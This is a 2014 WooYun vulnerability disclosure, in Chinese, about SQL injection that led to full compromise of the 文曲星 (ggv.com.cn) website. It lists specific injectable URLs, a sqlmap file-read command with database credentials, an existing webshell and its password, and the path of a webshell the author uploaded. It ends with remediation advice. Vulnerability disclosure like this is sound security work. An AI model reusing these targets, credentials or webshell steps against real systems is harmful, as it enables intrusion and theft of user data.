漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-061187
漏洞标题:文曲星官网全站沦陷,泄漏大量用户数据、产品资料
相关厂商:北京金远见电脑技术有限公司
漏洞作者: Coffee
提交时间:2014-05-17 21:47
修复时间:2014-07-01 21:47
公开时间:2014-07-01 21:47
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-07-01: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
全站沦陷,导致的问题:
1、服务器权限获取!
2、论坛、网站等上万用户密码泄漏!!
3、大量数据资料(产品的扩展资源)泄漏!!
4、被挂博彩黑链!
详细说明:
#1、发现注入点
注入点太多了,随便发两个:
http://down.ggv.com.cn/down/index_02.php?wqxtype=E828
http://www.ggv.com.cn/newdown/softlist.php?wqxtype=nc3000
权限很大,可跨库,于是得到了一大堆管理员账户。
但网站太过复杂,后台太多了,意义不明,个别后台成功进入后可编辑的部分极少,拿Shell失败。
部分后台:
http://www.ggv.com.cn/login.htm
http://renew.ggv.com.cn
还有一大堆子站的后台
#2、发现黑链,Webshell
既然有黑链说明已经被入侵过了,正好扫到前人留下的大马。
大马地址:http://www.ggv.com.cn/newweb/login.php
结合注入点读取文件
Sqlmap -u http://www.ggv.com.cn/newdown/subdownload.php?wqxtype=T1800 --dbms -cred=root:renew --file-read=/www/apache/htdocs/newweb/login.php
得到密码:j8
成功进入,传上自己的一句话:http://www.ggv.com.cn/newweb/topnew/top.php
#3、全站沦陷,数据库泄漏,大量数据资料泄漏
漏洞证明:
修复方案:
安全问题太多了。
1、网站没有防范注入的过滤机制。
2、数据库权限配置不合理。
3、服务器上存放大量其他工作文件。
建议:
1、网站可能被多次入侵,对网站上的后门集中扫描。
2、整改网站。
3、加强维护人员安全意识。
版权声明:转载请注明来源 Coffee@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝